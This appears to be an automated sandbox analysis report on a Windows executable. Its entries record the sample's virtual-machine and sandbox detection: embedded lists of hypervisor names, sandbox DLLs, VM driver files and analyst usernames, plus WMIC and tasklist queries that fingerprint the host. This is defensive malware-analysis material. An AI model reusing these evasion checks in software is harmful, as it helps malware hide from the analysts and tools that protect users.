Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 9KEZfGRjyK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 9KEZfGRjyK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: data.pdb source: 9KEZfGRjyK.exe
Source: Binary string: data.pdb)444 source: 9KEZfGRjyK.exe
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 9KEZfGRjyK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B903AA60 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,ReleaseMutex,0_2_00007FF7B903AA60
Source: 9KEZfGRjyK.exeStatic PE information: section name: .padding
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel /mtasklistsandboxusertestadminroot0_2_00007FF7B9018B20
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq wmicC:\windows\sysnative\drivers\vmmouse.sysC:\0_2_00007FF7B9012720
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7B9011000
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7B90242E0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel 0_2_00007FF7B90384D0
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model, Size FROM Win32_DiskDrive
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: tasklist.exe, 00000016.00000002.1780099999.00000299E7920000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL:\US
Source: tasklist.exe, 00000012.00000002.1760924301.000002991D9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL:\US
Source: tasklist.exe, 00000012.00000002.1760771163.000002991D828000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1760049495.000002991D827000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1759911172.000002991D816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLL@
Source: tasklist.exe, 00000016.00000003.1779101879.00000299E7688000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1778941181.00000299E7685000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1779926159.00000299E7689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: DIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000012.00000002.1760618205.000002991D7F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M SBIEDLL.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1760618205.000002991D7F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M SBIEDLL.DLL
Source: tasklist.exe, 00000018.00000002.1784817596.000001E4189D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M DIR_WATCH.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: DBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOM
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA
Source: 9KEZfGRjyK.exeBinary or memory string: API_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEM
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1780099999.00000299E7920000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLLOWSTEMP
Source: tasklist.exe, 00000018.00000002.1784950897.000001E418A0B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1783904747.000001E418A0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLLT
Source: tasklist.exe, 00000018.00000002.1784950897.000001E418A0B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000002.1785131555.000001E418B30000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1783904747.000001E418A0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIR_WATCH.DLL
Source: tasklist.exe, 00000016.00000002.1779777600.00000299E7650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M API_LOG.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000018.00000002.1784817596.000001E4189D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\DESKTOP\C:\WINDOWS\SYSTEM32\TASKLIST.EXE"TASKLIST" /M DIR_WATCH.DLLC:\WINDOWS\SYSTEM32\TASKLIST.EXEWINSTA0\DEFAULT
Source: tasklist.exe, 00000012.00000002.1760771163.000002991D828000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1760049495.000002991D827000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1759911172.000002991D816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: tasklist.exe, 00000016.00000002.1779777600.00000299E7650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "TASKLIST" /M API_LOG.DLL
Source: 9KEZfGRjyK.exeBinary or memory string: SBIEDLL.DLLDBGHELP.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLL/MTASKLISTSANDBOXUSERTESTADMINROOTMALWAREANALYSISDEFAULTABBEYADMINISTRATORALBRUNOBRUNOFREDFREDGEORGEGEORGEHARRY JOHNSONLISAPAUL userWORKVTCDEKKERUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMCOMPUTERSYSTEMGETMODEL
Source: tasklist.exe, 00000018.00000002.1785131555.000001E418B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MDIR_WATCH.DLLTEMP
Source: tasklist.exe, 00000012.00000002.1760924301.000002991D9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MSBIEDLL.DLLOWSTEMP
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - API_LOG.DLL
Source: tasklist.exe, 00000016.00000003.1779101879.00000299E7688000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1778941181.00000299E7685000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1779926159.00000299E7689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKLIST/MAPI_LOG.DLLM
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2460062209.0000025DD6519000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.0.drBinary or memory string: - SBIEDLL.DLL
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile opened / queried: C:\windows\sysnative\drivers\vmhgfs.sysJump to behavior
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile opened / queried: C:\windows\sysnative\drivers\vmmouse.sysJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT IdentifyingNumber FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902EB20 CloseHandle,FindFirstFileW,FindClose,0_2_00007FF7B902EB20
Source: tasklist.exe, 00000026.00000002.1825703380.000001C0633E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasklist/fiIMAGENAME eq vboxtray.exea\Local\Tem
Source: 9KEZfGRjyK.exeBinary or memory string: wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000024.00000002.1822204485.000002B99E388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE');
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000026.00000002.1825703380.000001C0633E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'PROI
Source: 9KEZfGRjyK.exeBinary or memory string: malwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: testadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: C:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000026.00000003.1824734626.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: 9KEZfGRjyK.exeBinary or memory string: workvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: , ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'0
Source: 9KEZfGRjyK.exeBinary or memory string: analysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: tasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: pstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: usertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: defaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: dir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: adminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: LisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: 9KEZfGRjyK.exeBinary or memory string: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
Source: tasklist.exe, 00000022.00000002.1814579848.00000219841A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: 9KEZfGRjyK.exeBinary or memory string: api_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystem
Source: tasklist.exe, 00000026.00000002.1825589127.000001C06327C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE');
Source: tasklist.exe, 00000022.00000003.1813576853.00000219841C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WMI.ExecQuery(SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE');
